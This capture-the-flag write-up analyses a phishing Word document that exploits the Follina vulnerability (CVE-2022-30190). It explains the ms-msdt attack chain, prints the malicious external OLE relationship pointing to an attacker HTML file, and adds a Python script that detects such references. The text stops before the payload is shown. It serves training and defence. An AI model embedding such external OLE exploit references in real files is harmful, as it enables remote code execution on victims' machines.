Diagnostic
hackthebox
Task: Analyze a malicious Office document from a phishing campaign to extract the hidden flag. Solution: Unzip the DOCX to find an external OLE object referencing an HTML file that exploits CVE-2022-30190 (Follina) via ms-msdt:/ protocol, decode the base64 PowerShell payload, and deobfuscate format string reordering to reveal the flag embedded in the malware filename.
Description
Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.
Analysis
This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:
- Phishing email with link to malicious .doc file
- Document contains external OLE object reference to HTML file
- HTML file uses ms-msdt:/ protocol handler to execute PowerShell
- PowerShell payload is base64 encoded and uses format string obfuscation
- Flag is hidden in the filename of the downloaded malware
Solution
Step 1: Download the malicious document
Since DNS no longer resolves, use the Host header to access the server directly by IP:
curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc
Step 2: Identify file type
file layoffs.doc # Output: Zip archive data, at least v2.0 to extract
The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).
Step 3: Extract and analyze document structure
unzip layoffs.doc -d extracted/
Directory structure:
extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
    ├── document.xml
    ├── _rels/
    │   └── document.xml.rels
    └── ...
Step 4: Find external OLE object reference
In word/document.xml, found an OLEObject with suspicious attributes:
- Type="Link" - External reference
- ProgID="htmlfile" - Will be handled by the HTML handler
- References relationship rId996
In word/_rels/document.xml.rels:
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>
Key indicator: External OLE object pointing to HTML file - classic Follina setup.
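The Step 4 check can be automated for triage. The following Python script is an added example, not part of the original writeup: it builds a constructed minimal DOCX in memory containing the relationship entry shown above, then flags any oleObject relationship with TargetMode="External" and marks HTML targets as Follina-like. The helper names and the minimal package layout are assumptions for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

def external_ole_targets(docx_bytes):
    """Return (rId, Target) pairs for external oleObject relationships.
    A legitimate embedded object lives inside the package; a URL target is suspicious."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            # Only relationship parts (e.g. word/_rels/document.xml.rels) declare targets
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append((rel.get("Id"), rel.get("Target")))
    return hits

def is_follina_like(target):
    """External OLE target that is an HTTP(S) URL to an HTML part (trailing '!' as in the sample)."""
    t = target.rstrip("!").lower()
    return t.startswith(("http://", "https://")) and t.endswith((".html", ".htm"))

# Constructed sample rels part: one benign internal relationship plus the entry from the writeup.
SAMPLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="rId996" Type="{OLE_REL}" '
    'Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>'
    "</Relationships>"
)

def build_sample_docx():
    """Constructed minimal DOCX (ZIP) with just the parts the check needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()

if __name__ == "__main__":
    for rid, target in external_ole_targets(build_sample_docx()):
        label = "FOLLINA-LIKE" if is_follina_like(target) else "external OLE"
        print(f"{label}: {rid} -> {target}")
```

Running it against a real sample means replacing build_sample_docx() with the bytes of layoffs.doc; the "!" suffix on the target is kept in the output so the exact URL can be blocked or searched for in proxy logs.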
...